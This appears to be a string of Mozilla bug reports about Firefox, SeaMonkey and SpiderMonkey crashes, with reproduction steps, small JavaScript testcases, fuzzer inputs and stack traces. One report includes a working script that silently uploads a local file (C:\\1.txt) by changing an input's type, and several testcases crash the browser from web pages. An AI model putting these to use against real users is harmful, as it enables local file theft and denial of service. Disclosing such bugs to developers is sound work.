nsIOService::SetOffline [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/netwerk/base/src/nsIOService.cpp, line 549]
nsIOService::Observe [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/netwerk/base/src/nsIOService.cpp, line 707]
nsObserverService::NotifyObservers [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/xpcom/ds/nsObserverService.cpp, line 235]
NS_ShutdownXPCOM_P [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/xpcom/build/nsXPComInit.cpp, line 795]
ScopedXPCOMStartup::~ScopedXPCOMStartup [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/toolkit/xre/nsAppRunner.cpp, line 554]
main [e:/builds/tinderbox/thunderbird-trunk/WINNT_5.0_Depend/mozilla/mail/app/nsMailApp.cpp, line 62]
kernel32.dll + 0x16d4f (0x7c816d4f)
|
|
316,186 | 2,695,877 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051112 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20051112 Firefox/1.6a1
When attempting to view the source of this online Subversion repository viewer (which uses XSLT the last time I was able to check), Firefox dies.
Reproducible: Always
Steps to Reproduce:
1. Go to URL
2. Ctrl+U (or just View->Page Source)
Actual Results:
Firefox go boom
Expected Results:
Firefox shows a sexy output of XML with many pretty colours
|
|
311,629 | 2,650,441 |
Tested to occur on:
1.0.7 (Win32, release);
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007
Firefox/1.6a1
Steps to reproduce:
1. perl -e 'print "+ " x 60000 ;' > test.txt
1a. Somehow get a string of "+ " repeated 60 000 times otherwise :)
2. copy the contents of test.txt into the JS console and click on Evaluate
3. crash
Expected Results
Error in JS console, and not crash.
Actual Results.
Crash
Discussion:
This is remotely exploitable (crash also happens in <script> tags on content
pages). Dataloss, I guess.
First few lines of talkback: (TB10376057Q, TB10376528Q, TB10376612X)
GetChar [c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsscan.c,
line 362]
js_GetToken
[c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsscan.c, line 1294]
UnaryExpr
[c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsparse.c, line 2764]
UnaryExpr
[c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsparse.c, line 2764]
UnaryExpr
[c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsparse.c, line 2764]
UnaryExpr
[c:/builds/tinderbox/Fx-Trunk/WINNT_5.2_Depend/mozilla/js/src/jsparse.c, line 2764]
... etc. Same stack (different line numbers - 303/774/2592) for 1.0.7
(Thanks to Tonglebeak and ispiked on #firefox for the help)
|
|
312,351 | 2,665,817 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051006 Firefox/1.4.1
When passing null to RegExp constructor, the browser crashes.
Reproducible: Always
Steps to Reproduce:
1. Evaluate RegExp(null) in the JavaScript console
or put it in <script> node in a HTML page.
Actual Results:
crash
Expected Results:
Perhaps construct the regexp /^$/ ? so it'll match only empty strings.
Tested on Ff 1.0.7 and 1.5b2, Tb 1.0.7.
The module is js3250.dll
|
|
312,704 | 2,669,147 |
Crash after clicking on "Continue>" button on ebay's "Review Your Purchase"
after selecting a payment method. It crashes when status bar displays "read
secureinclude.ebaystatic.com".
But it only crashes if JavaScript is switched *off* (javascript.enabled = false)
or is prohibited for the page via policies.
It crashes with Firefox Trunk Win 20051016, Seamonkey Trunk Win 20051013 and
Seamonkey Trunk Linux 20051016.
Talkback ID's for this are:
Seamonkey Win:
TB10733074Y, TB10733077G, TB10733304Z, TB10733396Q, TB10734827Y, TB10735665G
Firefox Win:
TB10762793X, TB10763001M
|
|
312,784 | 2,669,902 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051017 Firefox/1.4.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051017 Firefox/1.4.1
Firefox crash on about:config when changing a giving boolean with gmail notifier
0.5.2.1 (TB 10782990)
Reproducible: Always
Steps to Reproduce:
1.Install Gmail Notifier 0.5.2.1
(http://ftp.mozilla.org/pub/mozilla.org/extensions/gmail_notifier/gmail_notifier-0.5.2.1-fx+mz.xpi)
2.Restart Firefox to finish the installation
3.Log in your gmail account (using the icon on the status bar)
4.Put the mouse over the icon to get the tooltip
5.Open a new tab with about:config
6.Put 'gm' in the filter
7.Quick double click a couple of times on 'gm-notifier.ui.folderview' to switch
it from true to false, to false to true, it should crash after 2-3 times
|
|
313,080 | 2,672,235 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b5) Gecko/20051019 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8b5) Gecko/20051019 Firefox/1.5
These scripts cause Firefox crash:
<element/>.__proto__();
<element/>.__parent__();
<element/>.function::__proto__();
Reproducible: Always
Steps to Reproduce:
Talkback Incident IDs:
TB10279899 (The comment for this incident is wrong.)
TB10875233Y
|
|
325,540 | 2,764,121 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
The jsMath javascript library worked fine with Firefox 1.5. However, when using it in Firefox 1.5.0.1 it causes Firefox to crash immediately. You can see this at http://www.roadsignmath.com/. The jsMath library itself can be found at http://www.math.union.edu/~dpvc/jsMath/. (I have notified the author of this issue as well.)
Reproducible: Always
Steps to Reproduce:
1. Go to any page that uses the jsMath library.
2.
3.
Actual Results:
Browser crashes.
Expected Results:
Should have loaded the page.
|
|
325,925 | 2,766,830 |
User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1
If I visit http://www.visibone.com/javascript/jt2.html, type in my name and E-mail address, and then click "Run the Tests", tests run for a while and then the browser hangs (the display does not refresh for several minutes, at which point I kill it).
Reproducible: Always
Steps to Reproduce:
1.visit http://www.visibone.com/javascript/jt2.html
2.click "Run the Tests"
Actual Results:
Tests run (things flash in the textarea), then the browser hangs.
Expected Results:
Tests run (things flash in the textarea), the browser does not hang, I get a chance to submit new test results.
I did report this hang with Talkback a few minutes ago, but I don't know how to find out what my "Talkback crash ID" was.
This happens with both the official Firefox release 1.5.0.1, and the Debian package version 1.5.dfsg-4; in both cases I am running in a Debian-testing i386 chroot on an amd64 box.
|
|
325,947 | 2,766,953 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
If you make a file called 1.txt and place it on c:\ on a windows machine, and then try the URL (http://www.vup.dk/test/changetype.php) the file will be uploaded, without your approval.
This is indeed a high risc security issue. If you don't want to enter the url, the JS code is this:
function changeType(obj) {
obj.type="text";
obj.value="C:\\1.txt";
obj.type="file";
setTimeout("videre()", 1);
}
function videre() {
document.getElementById("submit").click();
}
Reproducible: Always
Steps to Reproduce:
1. Make a page, and run the javascript, and make, as an example php show the output
Actual Results:
File gets uploaded, and content is printed
Expected Results:
Denied the change of the input to .file
|
|
326,467 | 2,770,968 |
NTDLL! 7c901230()
js_Interpret(JSContext * 0x01ed32a8, unsigned char * 0x033ba81d, long * 0x0012c4a4) line 4495 + 93 bytes
js_Execute(JSContext * 0x01ed32a8, JSObject * 0x01fb9c18, JSScript * 0x033ba7d8, JSStackFrame * 0x0012d070, unsigned int 0x00000020, long * 0x0012c620) line 1480 + 19 bytes
obj_eval(JSContext * 0x01ed32a8, JSObject * 0x02cf5b88, unsigned int 0x00000002, long * 0x037d2c34, long * 0x0012c620) line 1270 + 27 bytes
js_Invoke(JSContext * 0x01ed32a8, unsigned int 0x00000002, unsigned int 0x00000000) line 1230 + 23 bytes
js_Interpret(JSContext * 0x01ed32a8, unsigned char * 0x02d289b9, long * 0x0012d0e0) line 3792 + 15 bytes
js_Invoke(JSContext * 0x01ed32a8, unsigned int 0x00000002, unsigned int 0x00000006) line 1254 + 19 bytes
fun_apply(JSContext * 0x01ed32a8, JSObject * 0x02bb2620, unsigned int 0x00000002, long * 0x037d2bd0, long * 0x0012d224) line 1656 + 15 bytes
js_Invoke(JSContext * 0x01ed32a8, unsigned int 0x00000002, unsigned int 0x00000000) line 1230 + 23 bytes
js_Interpret(JSContext * 0x01ed32a8, unsigned char * 0x01fa90b5, long * 0x0012dce4) line 3792 + 15 bytes
js_Invoke(JSContext * 0x01ed32a8, unsigned int 0x00000003, unsigned int 0x00000000) line 1254 + 19 bytes
js_Interpret(JSContext * 0x01ed32a8, unsigned char * 0x02c30548, long * 0x0012e754) line 3792 + 15 bytes
js_Invoke(JSContext * 0x01ed32a8, unsigned int 0x00000001, unsigned int 0x00000002) line 1254 + 19 bytes
js_InternalInvoke(JSContext * 0x01ed32a8, JSObject * 0x0327c490, long 0x030344a8, unsigned int 0x00000000, unsigned int 0x00000001, long * 0x0012e950, long * 0x0012e94c) line 1331 + 20 bytes
JS_CallFunctionValue(JSContext * 0x01ed32a8, JSObject * 0x0327c490, long 0x030344a8, unsigned int 0x00000001, long * 0x0012e950, long * 0x0012e94c) line 4174 + 31 bytes
nsJSContext::CallEventHandler(JSObject * 0x0327c490, JSObject * 0x030344a8, unsigned int 0x00000001, long * 0x0012e950, long * 0x0012e94c) line 1424 + 33 bytes
nsJSEventListener::HandleEvent(nsJSEventListener * const 0x0320e0f0, nsIDOMEvent * 0x03a81400) line 186 + 54 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x03514fe8, nsIDOMEventListener * 0x0320e0f0, nsIDOMEvent * 0x03a81400, nsIDOMEventTarget * 0x03a36d80, unsigned int 0x00000004, unsigned int 0x00000002) line 1653 + 16 bytes
nsEventListenerManager::HandleEvent(nsEventListenerManager * const 0x036439d0, nsPresContext * 0x009f78c0, nsEvent * 0x0012f73c, nsIDOMEvent * * 0x0012f044, nsIDOMEventTarget * 0x03a36d80, unsigned int 0x00000002, nsEventStatus * 0x0012f568) line 1760
nsXULElement::HandleDOMEvent(nsPresContext * 0x009f78c0, nsEvent * 0x0012f73c, nsIDOMEvent * * 0x0012f044, unsigned int 0x00000002, nsEventStatus * 0x0012f568) line 1885
nsXULElement::HandleDOMEvent(nsPresContext * 0x009f78c0, nsEvent * 0x0012f73c, nsIDOMEvent * * 0x0012f044, unsigned int 0x00000002, nsEventStatus * 0x0012f568) line 1904 + 60 bytes
nsGenericElement::HandleDOMEvent(nsPresContext * 0x009f78c0, nsEvent * 0x0012f73c, nsIDOMEvent * * 0x0012f044, unsigned int 0x00000007, nsEventStatus * 0x0012f568) line 2052 + 60 bytes
nsHTMLInputElement::HandleDOMEvent(nsPresContext * 0x009f78c0, nsEvent * 0x0012f73c, nsIDOMEvent * * 0x00000000, unsigned int 0x00000001, nsEventStatus * 0x0012f568) line 1360 + 31 bytes
PresShell::HandleEventInternal(nsEvent * 0x0012f73c, nsIView * 0x01fa3028, unsigned int 0x00000001, nsEventStatus * 0x0012f568) line 6076 + 52 bytes
PresShell::HandleEvent(PresShell * const 0x01fa35f8, nsIView * 0x01fa3028, nsGUIEvent * 0x0012f73c, nsEventStatus * 0x0012f568) line 5851 + 25 bytes
nsViewManager::HandleEvent(nsView * 0x01fa3028, nsPoint {...}, nsGUIEvent * 0x0012f73c, int 0x00000000) line 1675
nsViewManager::DispatchEvent(nsViewManager * const 0x0209f2c8, nsGUIEvent * 0x0012f73c, nsEventStatus * 0x0012f68c) line 1628 + 37 bytes
HandleEvent(nsGUIEvent * 0x0012f73c) line 176
nsWindow::DispatchEvent(nsWindow * const 0x01fa30fc, nsGUIEvent * 0x0012f73c, nsEventStatus & nsEventStatus_eIgnore) line 1169 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x0012f73c) line 1190
nsWindow::DispatchKeyEvent(unsigned int 0x00000083, unsigned short 0x0000, unsigned int 0x0000000d, long 0x001c0001, unsigned int 0x00000000) line 3382 + 15 bytes
nsWindow::OnKeyDown(unsigned int 0x0000000d, unsigned int 0x0000001c, long 0x001c0001) line 3520
nsWindow::ProcessMessage(unsigned int 0x00000100, unsigned int 0x0000000d, long 0x001c0001, long * 0x0012fc8c) line 4463 + 38 bytes
nsWindow::WindowProc(HWND__ * 0x0010051c, unsigned int 0x00000100, unsigned int 0x0000000d, long 0x001c0001) line 1358 + 27 bytes
USER32! 77d48734()
USER32! 77d48816()
USER32! 77d489cd()
USER32! 77d48a10()
nsAppShell::Run(nsAppShell * const 0x00a1b4e8) line 135
nsAppStartup::Run(nsAppStartup * const 0x00a534a0) line 208
main1(int 0x00000002, char * * 0x002a2638, nsISupports * 0x009e5948) line 1248 + 32 bytes
main(int 0x00000002, char * * 0x002a2638) line 1736 + 37 bytes
mainCRTStartup() line 338 + 17 bytes
KERNEL32! 7c816d4f()
Steps to reproduce:
(1) seamonkey -venkman
(2) In the Venkman console, enter the line:
for (var prop in ({1:1})) {void(prop)}
Expected results: none.
Actual results: crash.
Thanks to timeless for helping reduce the testcase.
Other variants leading to the crash:
var prop = null; for (prop in ({1:1})) {void(prop)}
Variants NOT crashing:
var prop = null;
for (prop in ({1:1}) {void(prop)}
var prop; for (prop in ({1:1})) {void(prop)} // ReferenceError: prop is not defined @ <x-jsd:interactive-session> 1
This crash happens in Venkman; it does not happen in xpcshell.
|
|
327,066 | 2,775,835 |
Steps to reproduce (WARNING! This will crash your browser):
1. Click on above URL
2. Crash and burn
TB IDs from a recent 1.8 nightly: TB15134809G, TB15134839Y, TB15134942E
Also happens with FF 1.5.0.1.
|
|
327,170 | 2,776,617 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
http://www.fatbrain.org/js-bug2.txt for the source-code version. Not much more to say, u fix ;)
Reproducible: Always
Steps to Reproduce:
1. Create a RegExp object.
2. Run replace function on some string: "teststring".replace(rx.compile("s", "g"), function() { fx.compile("bleh", "g"); })
3. Crash.
Actual Results:
Crash
|
|
313,669 | 2,678,932 |
Summary: Flash content fails to display when it hits/pulls from bfcache.
With browser.sessionhistory.max_total_viewers set to -1, I experience this bug. If I change that to 0, this works fine.
Regression Range:
Works: 2005-10-21-08 trunk
Fails: 2005-10-22-08 trunk
This affects the branch, too: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b5) Gecko/20051024 Firefox/1.5 displays this problem.
Suspected bug is bug 311791.
Steps to Reproduce:
1. Load http://www.macromedia.com
2. Load another page (any page)
3. Click Back
Expected Results:
Flash content (middle of the page) loads and displays.
Actual Results:
No Flash content displays.
|
|
315,189 | 2,688,612 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20051101 Camino/1.0+
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20051101 Camino/1.0+
Not much to add. Will attach a test case to show the crashing...
Reproducible: Always
Steps to Reproduce:
1. Load the url
Actual Results:
Crashes
Expected Results:
Not crashing? =)
|
|
319,293 | 2,716,491 |
I'm crashing on trunk trying to look at an svg file in DOM Inspector. FF1.5 works fine.
Talkbacks 12659844, TB12659807, TB12659594, TB12659568, TB12659561
Testcase (not minimized, but it's small anyway) coming up.
|
|
319,384 | 2,717,086 |
Steps to reproduce are to load the page in the URL field in a debug build.
This is fallout from bug 215173. Basically, we end up hitting an error converting some random string to an integer, which means we try to report the error listed in js.msg as:
117 MSG_DEF(JSMSG_CANT_CONVERT, 35, 1, JSEXN_NONE, "can't convert {0} to an integer")
Note the JSEXN_NONE there. We end up in js_ErrorToException, which assigns JSEXN_NONE to |exn|, but thsi JSEXN_NONE has made a trip through the exnType member of JSErrorFormatString, which is a uint16. So the value assigned to EXN is 65535 (-1 cast to uint16, then cast back to int). Then we get:
#1 0xb7dfeb8f in js_ErrorToException (cx=0xb3fb6860,
message=0xb3efc7c0 "can't convert cfunc to an integer", reportp=0xbfffced4)
at ../../../mozilla/js/src/jsexn.c:955
955 JS_ASSERT(exn < JSEXN_LIMIT);
And that assertion of course fails (since JSEXN_LIMIT <= 65535).
Then we go on and see:
968 if (exn == JSEXN_NONE)
969 return JS_FALSE;
which probably doesn't return since (int)65535 != (int)-1.
I assume that may be why we crash in opt builds on this site...
|
|
319,683 | 2,719,122 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
the browser crashes when running the following function:
function crash(){
function f(){
var x;
function g(){
x=1; //reffere anything here or Moz will not crash.
}
}
//apply an object to the __proto__ attribute
f.__proto__={}; //= [];
//the following call will cause Moz. to crash
f();
}
Reproducible: Always
Steps to Reproduce:
1. create an html page with a script
2. use the code provided in the details above
3. add a button or an onload atribute to the html page which runs the crash() function
4. watch mozilla crash
Actual Results:
the browser crashes with the feedback agend coming up and WinXP displaying a window asking to stop the process.
Expected Results:
The script should run without any problems.
I do understand that mozilla is using the __proto__ property on objects for it's prototype chain handling. Though, as neither mozilla's JavaScript specs nor the !ECMAScript specs disallow the use of such properties in the user's script using such properties should neither crash the script execution nor crash the entire browser.
The prototype chain handling should not depend on the __proto__ it should rather use an internal object not directly visible to the script. Prototype chain handling could sill be made accessable to the script by providing function (e.g. as functions like setProto(obj, newProto) and {{{getProto(obj)}}) This way overwriting even those functions will neither affect the script nor the prototype chain handling. A script could still implement the __proto__ property by using getters and setters. The advantage would be that the __protot__ object would only exsist in that script and cause no problems to other scripts.
|
|
319,980 | 2,721,398 |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051212 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051212 Firefox/1.6a1
when creating a new array, setting it to a global variable, and populating the array with literal in a loop, the garbage collector will not collect this array, this results in the browser eating all available system memory
on the other hand the array will be collected if it was populated with objects created with "new"
IE6 does not have this problem
this happens everytime WHEN:
1. new tabs/windows are not created
2. old tabs/windows are not refreshed/closed
Reproducible: Always
Steps to Reproduce:
1. call function to create array, set to a global variable, populate array
2. repeat function every x seconds
3. meanwhile, not creating/closing/refreshing tabs or windows
<html><head><script type="text/javascript">
var a;
function update()
{
a = new Array(100000);
for( var i = 0; i < 100000; i++ )
{
a[i] = i; //a[i] = new Number(i) has no problem
}
//delete a; //does not help
//a = null; //does not help
}
setInterval( "update()", 1000 );
</script></head><body></body></html>
Actual Results:
FUBARed system
|
|
320,172 | 2,722,751 |
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13
Build Identifier: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
When a DIV in a page is updated using the Prototype library's Ajax.Updater with evalScripts set to true, and the updated content contains inline JavaScript, Firefox crashes. We've tried this on Mac OS X on both 1.0.7 and 1.5, and on Windows XP 1.0.7 and 1.5, and on Linux 1.0.7.
Firefox does not crash if the response text from the Ajax call does not contain inline JavaScript. Additionally, the actual inline JavaScript call does not seem to matter; the crash will occur with a simple "var x = 5;" or more complex code.
Reproducible: Always
Steps to Reproduce:
1. Visit http://www.peakstrategy.net/firefox_rules/ (also works if the files are local)
2. Wait for the Ajax call to complete.
Actual Results:
Firefox crashes.
Expected Results:
The DIV would be updated with the response text of the Ajax call, or, in the worst case, Firefox would indicate that there was a problem in the Prototype library or in our use of it, without crashing.
This crash has been filed as several Talkback incidents, including TB12925669Z.
|
|
1,456,512 | 13,229,819 |
The following testcase crashes on mozilla-central revision 26e53729a109 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe):
var wm = new WeakMap();
grayRoot().map = wm;
wm = null;
gczeal(13, 7);
var lfOffThreadGlobal = newGlobal();
Backtrace:
received signal SIGSEGV, Segmentation fault.
0x0000000000f24468 in JS::UnmarkGrayGCThingRecursively (thing=thing@entry=...) at js/src/gc/Marking.cpp:3625
#0 0x0000000000f24468 in JS::UnmarkGrayGCThingRecursively (thing=thing@entry=...) at js/src/gc/Marking.cpp:3625
#1 0x00000000004eb7bb in js::gc::TenuredCell::readBarrier (thing=0x7ffff4c8a4c0) at js/src/gc/Cell.h:397
#2 0x0000000000c8d604 in js::InternalBarrierMethods<js::UnownedBaseShape*>::readBarrier (v=<optimized out>) at js/src/gc/Barrier.h:269
#3 js::ReadBarrieredBase<js::UnownedBaseShape*>::read (this=0x7ffff4930b88) at js/src/gc/Barrier.h:593
#4 js::ReadBarriered<js::UnownedBaseShape*>::get (this=0x7ffff4930b88) at js/src/gc/Barrier.h:649
#5 js::ReadBarriered<js::UnownedBaseShape*>::operator js::UnownedBaseShape* const& (this=0x7ffff4930b88) at js/src/gc/Barrier.h:661
#6 JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::UnownedBaseShape*>, js::StackBaseShape, js::SystemAllocPolicy> >::entryNeedsSweep (prior=...) at /srv/jenkins/jobs/mozilla-central-build-jsshell/workspace/arch/64/compiler/gcc/instrumentation/none/type/debug/dist/include/js/GCHashTable.h:641
#7 JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::UnownedBaseShape*>, js::StackBaseShape, js::SystemAllocPolicy> >::Range::settle (this=this@entry=0x7fffffffce40) at dist/include/js/GCHashTable.h:671
#8 0x0000000000c8233d in JS::WeakCache<JS::GCHashSet<js::ReadBarriered<js::UnownedBaseShape*>, js::StackBaseShape, js::SystemAllocPolicy> >::Range::popFront (this=0x7fffffffce40) at dist/include/js/GCHashTable.h:664
#9 JS::Zone::checkBaseShapeTableAfterMovingGC (this=0x7ffff49ec000) at js/src/vm/Shape.cpp:1516
#10 0x0000000000ee88df in js::gc::CheckHashTablesAfterMovingGC (rt=rt@entry=0x7ffff5f19000) at js/src/gc/GC.cpp:8462
#11 0x0000000000f30a90 in js::Nursery::doCollection (this=this@entry=0x7ffff5f1c070, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME, tenureCounts=...) at js/src/gc/Nursery.cpp:937
#12 0x0000000000f30e0f in js::Nursery::collect (this=0x7ffff5f1c070, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/gc/Nursery.cpp:729
#13 0x0000000000ed83c4 in js::gc::GCRuntime::minorGC (this=0x7ffff5f19700, reason=JS::gcreason::DESTROY_RUNTIME, phase=<optimized out>) at js/src/gc/GC.cpp:7826
#14 0x0000000000eea802 in js::gc::GCRuntime::gcCycle (this=this@entry=0x7ffff5f19700, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/gc/GC.cpp:7431
#15 0x0000000000eeaff5 in js::gc::GCRuntime::collect (this=this@entry=0x7ffff5f19700, nonincrementalByAPI=nonincrementalByAPI@entry=true, budget=..., reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/gc/GC.cpp:7622
#16 0x0000000000eeb399 in js::gc::GCRuntime::gc (this=this@entry=0x7ffff5f19700, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_RUNTIME) at js/src/gc/GC.cpp:7692
#17 0x0000000000c3a904 in JSRuntime::destroyRuntime (this=0x7ffff5f19000) at js/src/vm/Runtime.cpp:315
#18 0x0000000000b8bc71 in js::DestroyContext (cx=0x7ffff5f15000) at js/src/vm/JSContext.cpp:201
#19 0x0000000000a0ab8a in JS_DestroyContext (cx=<optimized out>) at js/src/jsapi.cpp:496
#20 0x00000000004442b1 in main (argc=<optimized out>, argv=<optimized out>, envp=<optimized out>) at js/src/shell/js.cpp:9254
rax 0x0 0
rbx 0x7ffff4c8a4c0 140737300178112
rcx 0x7ffff6c282ad 140737333330605
rdx 0x0 0
rsi 0x7ffff6ef7770 140737336276848
rdi 0x7ffff6ef6540 140737336272192
rbp 0x7fffffffcd50 140737488342352
rsp 0x7fffffffcd30 140737488342320
r8 0x7ffff6ef7770 140737336276848
r9 0x7ffff7fe4780 140737354024832
r10 0x58 88
r11 0x7ffff6b9e7a0 140737332766624
r12 0x7ffff4c8a4c7 140737300178119
r13 0x7fffffffcda0 140737488342432
r14 0x7ffff4930b88 140737296665480
r15 0x0 0
rip 0xf24468 <JS::UnmarkGrayGCThingRecursively(JS::GCCellPtr)+168>
=> 0xf24468 <JS::UnmarkGrayGCThingRecursively(JS::GCCellPtr)+168>: movl $0x0,0x0
0xf24473 <JS::UnmarkGrayGCThingRecursively(JS::GCCellPtr)+179>: ud2
Also likely shell-only.
|
|
1,456,524 | 13,229,887 |
The following testcase crashes on mozilla-central revision 26e53729a109 (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --without-intl-api --enable-optimize --target=i686-pc-linux-gnu --enable-simulator=arm, run with --fuzzing-safe --ion-offthread-compile=off --ion-eager):
oomTest(function() {
eval(`
function f() {
var n;
for (var i = 0; i < 18; ++i) {
if (k) {}
}
return [k, n];
}
var [a, b] = f();
`);
});
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0 0x084897d1 in js::jit::MoveResolver::PendingMove::setCycleEnd (this=<optimized out>, this=<optimized out>, cycleSlot=<optimized out>) at js/src/jit/MoveResolver.h:286
#1 js::jit::MoveResolver::resolve (this=<optimized out>) at js/src/jit/MoveResolver.cpp:271
#2 0x082d8233 in js::jit::CodeGenerator::visitMoveGroup (this=0xf3d7e000, group=0xf3db31e0) at js/src/jit/CodeGenerator.cpp:3330
#3 0x08320a63 in js::jit::CodeGenerator::generateBody (this=0xf3d7e000) at js/src/jit/CodeGenerator.cpp:5775
#4 0x0832141a in js::jit::CodeGenerator::generate (this=0xf3d7e000) at js/src/jit/CodeGenerator.cpp:10119
#5 0x0834a3ed in js::jit::GenerateCode (mir=0xf3dac0f8, lir=0xf3daeb38) at js/src/jit/Ion.cpp:1913
#6 0x083a8816 in js::jit::CompileBackEnd (mir=0xf3dac0f8) at js/src/jit/Ion.cpp:1935
#7 0x083a98e9 in js::jit::IonCompile (cx=<optimized out>, cx@entry=0xf6e1d800, script=<optimized out>, baselineFrame=baselineFrame@entry=0x0, osrPc=0x0, recompile=false, optimizationLevel=js::jit::OptimizationLevel::Normal) at js/src/jit/Ion.cpp:2215
#8 0x083a9f43 in js::jit::Compile (cx=cx@entry=0xf6e1d800, script=script@entry=..., osrFrame=osrFrame@entry=0x0, osrPc=0x0, forceRecompile=false) at js/src/jit/Ion.cpp:2425
#9 0x083aa070 in js::jit::CanEnterIon (cx=0xf6e1d800, state=...) at js/src/jit/Ion.cpp:2509
#10 0x083ccacc in js::jit::MaybeEnterJit (cx=0xf6e1d800, state=...) at js/src/jit/Jit.cpp:140
#11 0x081e239f in js::RunScript (cx=<optimized out>, state=...) at js/src/vm/Interpreter.cpp:402
#12 0x081e2a05 in js::InternalCallOrConstruct (cx=<optimized out>, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:489
#13 0x081e2cf0 in InternalCall (cx=cx@entry=0xf6e1d800, args=...) at js/src/vm/Interpreter.cpp:516
#14 0x081e2e6f in js::CallFromStack (cx=0xf6e1d800, args=...) at js/src/vm/Interpreter.cpp:522
#15 0x082be1a4 in js::jit::DoCallFallback (cx=<optimized out>, frame=0xf5bffca8, stub_=0xf3da2030, argc=0, vp=0xf5bffc78, res=...) at js/src/jit/BaselineIC.cpp:2380
#16 0x085f6410 in js::jit::Simulator::softwareInterrupt (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:2707
#17 0x085f6c16 in js::jit::Simulator::decodeType7 (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:3876
#18 0x085f4b02 in js::jit::Simulator::instructionDecode (this=0xf6e58000, instr=0xf6e78164) at js/src/jit/arm/Simulator-arm.cpp:4856
#19 0x085f882a in js::jit::Simulator::execute<false> (this=0xf6e58000) at js/src/jit/arm/Simulator-arm.cpp:4911
#20 js::jit::Simulator::callInternal (this=0xf6e58000, entry=0x20469800 "\360O-\351\004\320M\342\020\212-\355\r\200\240\341h\220\235\345\r\260\240\341t\240\235", <incomplete sequence \345>) at js/src/jit/arm/Simulator-arm.cpp:4991
